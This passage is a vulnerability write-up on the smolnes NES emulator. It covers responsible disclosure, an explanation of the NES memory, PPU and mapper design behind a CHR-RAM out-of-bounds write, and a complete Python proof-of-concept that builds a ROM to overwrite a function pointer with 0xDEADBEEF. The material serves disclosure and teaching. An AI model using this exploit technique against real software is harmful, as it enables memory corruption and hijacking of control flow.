The vulnerabilities described in this write-up were reported to the project’s maintainer (binji/smolnes) by email before this article was published. His response, unsurprisingly for a code golf project, was that he “wasn’t too worried about OOB in smolnes”. He authorized me to publish this write-up.

These vulnerabilities technically meet the criteria for CVE assignment: they are reproducible, documented, and the impact (guaranteed DoS, memory corruption) is real.

However, filing a CVE would have been counterproductive in this case. SmolNES is a hobby code golf project with 3 contributors, designed as a compactness exercise and not intended for production deployment. There is no proven critical exploitation path in the binary as distributed (the GOT and heap are out of reach, no function pointer exists in the reachable region).

Given the nature of the project and the absence of a critical exploitation path, I decided not to pollute the ecosystem with a pointless CVE.

This aligns with what this article describes well: CVSS scores are calculated for the worst-case deployment scenario, regardless of actual context. The author himself acknowledges that some CVEs “have no viable exploitation path or deployment, and frankly waste everyone’s time.” A hobby NES emulator is the perfect example.


11. Appendix: Required NES concepts

This appendix covers the NES architectural concepts required to understand the vulnerability.


The NES (Nintendo Entertainment System, 1983) is made up of three main components:

  • CPU: a Ricoh 2A03, derived from the MOS Technology 6502. 8-bit processor, 16-bit address bus (64 KB address space).
  • PPU (Picture Processing Unit): the Ricoh 2C02, handles display. It has its own 16 KB address space, separate from the CPU’s.
  • APU (Audio Processing Unit): integrated into the CPU, handles sound (5 channels).

The game is stored on a cartridge containing two types of memory:

  • PRG-ROM: the game code and program data (read by the CPU via $8000-$FFFF)
  • CHR-ROM or CHR-RAM: the graphics data (tiles, sprites), accessed by the PPU

The CPU addresses 64 KB (0x0000 to 0xFFFF), broken down as follows:

$0000 - $07FF : Internal RAM (2 KB, mirrored over $0000-$1FFF)
$2000 - $2007 : PPU registers (mirrored across the entire $2000-$3FFF range)
$4000 - $4017 : APU and I/O registers (joypads, DMA)
$6000 - $7FFF : PRG-RAM (optional cartridge RAM)
$8000 - $FFFF : PRG-ROM (game code) + Mapper registers

The Reset Vector: when the NES powers on, the CPU reads the two bytes at $FFFC-$FFFD and jumps to the address they contain. That’s the game’s entry point.

6502 instructions relevant to the vulnerability:

  • LDA #val (opcode A9): loads an immediate value into accumulator A
  • STA $addr (opcode 8D + 2 little-endian bytes): writes A to absolute memory
  • INC $addr,X (opcode FE + 2 bytes): reads, increments, and writes back the memory value (Read-Modify-Write)

prg[] and memory windows:

prg is an array whose elements contain the number of a PRG bank currently mapped into CPU memory. A PRG bank is 16 KB. Example:

prg[0] = 2; // the $8000-$BFFF range points to bank 2 of the ROM
prg[1] = 5; // the $C000-$FFFF range points to bank 5 of the ROM

The PPU manages the display through its own 16 KB address space:

$0000 - $1FFF : Pattern Tables (CHR: 8x8 pixel tiles, 2 banks of 4 KB)
$2000 - $3EFF : Nametables (screen map)
$3F00 - $3FFF : Palette RAM (32 active colors)

Registers $2006 (PPUADDR) and $2007 (PPUDATA)

The CPU cannot directly access VRAM. It communicates with the PPU through memory-mapped registers in the $2000-$2007 range:

$2006 (PPUADDR): sets the target address in VRAM via two consecutive writes (toggle controlled by bit W):

First write  -> high byte of the address (stored in T, temporary register)
Second write -> low byte + copy of T into V (V = active address)

case 6: // $2006 PPUADDR
  T = (W ^= 1)
          ? T & 0xff | val % 64 << 8   // 1st write: bits 8-13 of T
          : (V = T & ~0xff | val);     // 2nd write: bits 0-7 of T, then V = T

$2007 (PPUDATA): reads or writes one byte at the address pointed to by V. After each access, V auto-increments:

V += ppuctrl & 4 ? 32 : 1;
V %= 16384; // 16384 = 2^14: the PPU space is 14 bits wide (0 to 16383)

This auto-increment mechanism allows writing consecutive byte sequences to VRAM with only repeated STA $2007 instructions.
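The latch and the auto-increment can be modelled in a few lines of Python. This is a toy model of the two snippets above only (no actual memory access); the class and method names are mine.

```python
class PpuAddr:
    """Toy model of the $2006 latch and the $2007 auto-increment."""

    def __init__(self):
        self.T = 0          # temporary address
        self.V = 0          # active address
        self.W = 0          # write toggle
        self.ppuctrl = 0    # bit 2 selects the increment (1 or 32)

    def write_2006(self, val):
        self.W ^= 1
        if self.W:          # 1st write: bits 8-13 of T
            self.T = (self.T & 0xFF) | ((val % 64) << 8)
        else:               # 2nd write: bits 0-7 of T, then V = T
            self.T = (self.T & ~0xFF) | val
            self.V = self.T

    def access_2007(self):
        """Return the address used by this access, then advance V."""
        used = self.V
        self.V = (self.V + (32 if self.ppuctrl & 4 else 1)) % 16384
        return used

ppu = PpuAddr()
ppu.write_2006(0x08)        # high byte
ppu.write_2006(0x78)        # low byte -> V = $0878
addresses = [ppu.access_2007() for _ in range(3)]
print([hex(a) for a in addresses])
```

Three consecutive accesses touch $0878, $0879 and $087A, which is the pattern a run of STA $2007 instructions relies on.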


The CPU only sees 32 KB of PRG-ROM at a time and the PPU 8 KB of CHR. But some games need much more (Super Mario Bros. 3: 256 KB of PRG-ROM plus 128 KB of CHR-ROM, 384 KB in total).

The solution: Mappers, extra chips inside the cartridge that enable bank switching. The CPU always sees the same addresses ($8000-$FFFF), but the Mapper can connect different chunks of the ROM to those addresses.

How the game controls the Mapper: writes to the ROM region ($8000-$FFFF) do not modify the ROM (read-only). This behavior is repurposed: writes are intercepted and interpreted as bank switching commands. This is Memory-Mapped I/O (MMIO).

In SmolNES, the Mapper number is encoded in bits 4-7 of iNES header byte 6 (rombuf[6] >> 4).


CHR-ROM: most games store their graphics in a dedicated ROM chip on the cartridge. Graphics are fixed. chrrom points into the ROM file buffer.

CHR-RAM: some games (such as The Legend of Zelda and Metroid) have no CHR-ROM chip. The cartridge carries 8 KB of RAM instead, which the game fills at run time and can modify dynamically. chrrom then points to chrram[8192].

In SmolNES, header byte 5 (rombuf[5]) determines the mode:

// rombuf[5] != 0: CHR-ROM from the file
// rombuf[5] == 0: CHR-RAM (static 8 KB)
chrrom = rombuf[5] ? rom + (rombuf[4] << 14) : chrram;

This distinction is at the heart of the vulnerability: Mappers allow selecting among multiple CHR banks. In CHR-ROM mode, having multiple banks is normal: the ROM file can contain many. But in CHR-RAM mode, there are only 2 physical banks (0 and 1, i.e. 8 KB). Selecting bank 2 goes past the end of chrram[8192].


Mapper 3, also known as CNROM, is one of the simplest. It only manages the CHR bank. Any write to $8000-$FFFF changes the active graphics bank:

case 3: // mapper 3 (CNROM)
  chr[0] = val % 4 * 2; // val % 4 gives 0, 1, 2, or 3; * 2 gives 0, 2, 4, or 6
  chr[1] = chr[0] + 1;  // Next bank: 1, 3, 5, or 7
  break;
// CHR bank is selected in pairs (two 4 KB sub-banks)
// Bank 0: chr[0]=0, chr[1]=1 (offsets 0 and 4096 into chrram -> valid)
// Bank 1: chr[0]=2, chr[1]=3 (offsets 8192 and 12288 -> OVERFLOW if CHR-RAM)
// Bank 2: chr[0]=4, chr[1]=5 (offsets 16384 and 20480 -> even further)
// Bank 3: chr[0]=6, chr[1]=7 (offsets 24576 and 28672 -> maximum range)

In CHR-ROM mode, these offsets are valid as long as the file actually contains that much CHR data (32 KB to cover bank 3). In CHR-RAM mode, only offsets 0 and 4096 (bank 0) are valid.
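The arithmetic above is easy to check by replaying the Mapper 3 write for every possible value. The sketch below mirrors the two C assignments in Python; the function names are mine, and the 8192-byte limit is the chrram size quoted earlier.

```python
SUB_BANK = 4096
CHRRAM_SIZE = 8192


def mapper3_write(val: int):
    """Mirror of the case 3 handler: returns (chr[0], chr[1])."""
    chr0 = val % 4 * 2
    return chr0, chr0 + 1


def chr_offsets(val: int):
    """Byte offsets into chrrom of the two 4 KB sub-banks selected by val."""
    return tuple(bank * SUB_BANK for bank in mapper3_write(val))


for val in range(4):
    offs = chr_offsets(val)
    status = "OVERFLOW" if max(offs) + SUB_BANK > CHRRAM_SIZE else "ok"
    print(f"val={val}: chr={mapper3_write(val)} offsets={offs} {status}")

# Values whose sub-banks end past chrram[8192] in CHR-RAM mode.
overflowing = [v for v in range(4) if max(chr_offsets(v)) + SUB_BANK > CHRRAM_SIZE]
# Last byte reachable through chr[1] with val % 4 == 3.
furthest = max(chr_offsets(3)) + SUB_BANK - 1
```

Only `val % 4 == 0` stays in bounds. The other three values open a window from offset 8192 up to offset 32767, i.e. 24 KB of memory following chrram.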


A .nes file begins with a 16-byte header:

Offset  Size  Description
0       4     "NES\x1A" (magic number)
4       1     Number of PRG-ROM banks (16 KB each)
5       1     Number of CHR-ROM banks (8 KB each). 0 = CHR-RAM mode
6       1     Flags:
                bit 0    : mirroring (0=horizontal, 1=vertical)
                bit 1    : battery (persistent PRG-RAM)
                bit 2    : trainer (512 bytes before PRG-ROM)
                bits 4-7 : low nibble of Mapper number
7       1     Flags:
                bits 4-7 : high nibble of Mapper number
8-15    8     Unused (base iNES format)

In SmolNES, these values are read from rombuf without validation and used directly to configure the emulator.
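For contrast, here is a sketch of what a validating parser for this header could look like. It is not taken from SmolNES: `INesHeader` and `parse_ines` are hypothetical names, and the size check assumes the layout described in the table (header, optional 512-byte trainer, PRG banks, CHR banks).

```python
from dataclasses import dataclass


@dataclass
class INesHeader:
    prg_banks: int
    chr_banks: int          # 0 means CHR-RAM mode
    mapper: int
    vertical_mirroring: bool
    has_trainer: bool


def parse_ines(data: bytes) -> INesHeader:
    """Parse the 16-byte iNES header and reject obviously inconsistent files."""
    if len(data) < 16 or data[:4] != b"NES\x1a":
        raise ValueError("not an iNES file")
    flags6, flags7 = data[6], data[7]
    hdr = INesHeader(
        prg_banks=data[4],
        chr_banks=data[5],
        # High nibble from byte 7, low nibble from byte 6.
        mapper=(flags7 & 0xF0) | (flags6 >> 4),
        vertical_mirroring=bool(flags6 & 0x01),
        has_trainer=bool(flags6 & 0x04),
    )
    expected = (16 + (512 if hdr.has_trainer else 0)
                + hdr.prg_banks * 16384 + hdr.chr_banks * 8192)
    if len(data) < expected:
        raise ValueError(f"file truncated: {len(data)} bytes, header implies {expected}")
    return hdr


# Same header values as a Mapper 3, CHR-RAM ROM with one PRG bank.
rom = b"NES\x1a" + bytes([1, 0, 0x30, 0]) + bytes(8) + bytes(16384)
print(parse_ines(rom))
```

A check like this catches truncated files, but it would not stop the Mapper 3 overflow on its own: that header is perfectly well-formed, and the out-of-range bank is chosen later by 6502 code at runtime.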

#!/usr/bin/env python3
"""
PoC ROM for smolnes: OOB Write via Mapper 3 CHR-RAM -> overwrite render_hook.

.bss layout (smolnes/deobfuscated binary compiled with poc_hook.c as second source):
    chrram      : offset 0     (8192 bytes)
    render_hook : offset 18552 (8 bytes, uint8_t*)

Parameters:
    - Mapper 3 active (rombuf[6] >> 4 == 3)
    - CHR-RAM mode (rombuf[5] == 0) => chrrom = chrram
    - val=2 written to $8000 => chr[0] = 2%4*2 = 4
    - V = 0x0878 (via two $2006 writes)
    - get_chr_byte(0x0878) = &chrram[chr[0]*4096 + 0x878] = &chrram[18552] = &render_hook

Target: write 0xDEADBEEF into render_hook (little-endian, 8 bytes).
Trigger: when scany==241, dot==1, smolnes calls render_hook() => SIGSEGV.
"""
TARGET_ADDR = 0xDEADBEEF
# ---- Parameter calculation ----
CHRRAM_SIZE = 8192
HOOK_OFFSET = 18552 # p/d (long)&render_hook - (long)&chrram
BANK_INDEX = HOOK_OFFSET // 4096 # = 4 (chr[0] to reach)
INTRA_OFFSET = HOOK_OFFSET % 4096 # = 2168 = 0x878
assert BANK_INDEX in [2, 4, 6], f"Bank {BANK_INDEX} not reachable with Mapper 3 (val%4*2)"
MAPPER_VAL = BANK_INDEX // 2 # val such that val%4*2 = BANK_INDEX => val = BANK_INDEX/2
# V = INTRA_OFFSET: V < 0x1000, so the PPU access is routed through chr[0]
V = INTRA_OFFSET # 0x878
V_HIGH = (V >> 8) & 0x3F # high byte for $2006 (6 bits)
V_LOW = V & 0xFF # low byte for $2006
TARGET_BYTES = TARGET_ADDR.to_bytes(8, 'little')
print(f"[*] render_hook offset from chrram: {HOOK_OFFSET} (0x{HOOK_OFFSET:04X})")
print(f"[*] Bank index: {BANK_INDEX} => mapper write val={MAPPER_VAL} to $8000")
print(f"[*] V = 0x{V:04X} => $2006 writes: 0x{V_HIGH:02X} then 0x{V_LOW:02X}")
print(f"[*] Target: 0x{TARGET_ADDR:016X}")
print(f"[*] Little-endian bytes: {TARGET_BYTES.hex()}")
# ---- 6502 code construction ----
code = bytearray()
def nop():
    return bytes([0xEA])

def lda_imm(val):
    return bytes([0xA9, val])

def sta_abs(addr):
    return bytes([0x8D, addr & 0xFF, addr >> 8])

def jmp_abs(addr):
    return bytes([0x4C, addr & 0xFF, addr >> 8])
# Step 1: Mapper 3, write to $8000 to set chr[0] = BANK_INDEX
code += lda_imm(MAPPER_VAL)
code += sta_abs(0x8000)
# Step 2: set V via two consecutive writes to $2006
code += lda_imm(V_HIGH)
code += sta_abs(0x2006)
code += lda_imm(V_LOW)
code += sta_abs(0x2006)
# Step 3: write the 8 bytes of TARGET_ADDR via $2007
# get_chr_byte(V) => &chrram[HOOK_OFFSET] = &render_hook
# V auto-increments by 1 after each access => consecutive writes
for byte in TARGET_BYTES:
    code += lda_imm(byte)
    code += sta_abs(0x2007)
# Infinite loop (NOP + JMP) to let the PPU advance to scany==241
nop_offset = len(code)
code += nop() # NOP
code += jmp_abs(0x8000 + nop_offset) # JMP back to NOP
print(f"[*] Code size: {len(code)} bytes (starts at $8000)")
print(f"[*] NOP loop at $8000+{nop_offset} = $" + f"{0x8000+nop_offset:04X}")
# ---- iNES ROM construction ----
PRG_SIZE = 16384 # 1 PRG bank = 16 KB
# iNES header (16 bytes)
header = bytearray(16)
header[0:4] = b'NES\x1a'
header[4] = 1 # 1 PRG bank (16 KB)
header[5] = 0 # 0 CHR banks => CHR-RAM mode
header[6] = 0x30 # Mapper 3 (high nibble = 3), horizontal mirroring
# bytes 7-15 = 0x00
# PRG ROM: filled with NOPs (0xEA), code at the start, reset vector at the end
prg = bytearray(nop() * PRG_SIZE)
# Code at offset 0 ($8000)
prg[0:len(code)] = code
# Reset vector at $FFFC-$FFFD (offset 0x3FFC in PRG): points to $8000
prg[PRG_SIZE-4] = 0x00 # low byte of $8000
prg[PRG_SIZE-3] = 0x80 # high byte of $8000
rom = bytes(header) + bytes(prg)
output_path = "poc_deadbeef.nes"
with open(output_path, "wb") as f:
    f.write(rom)
print(f"\n[+] ROM written: {output_path} ({len(rom)} bytes)")
print(f"[+] Run: ./smolnes/deobfuscated {output_path}")
print(f"[+] Expected: SIGSEGV / call to 0x{TARGET_ADDR:X} after ~1 PPU frame")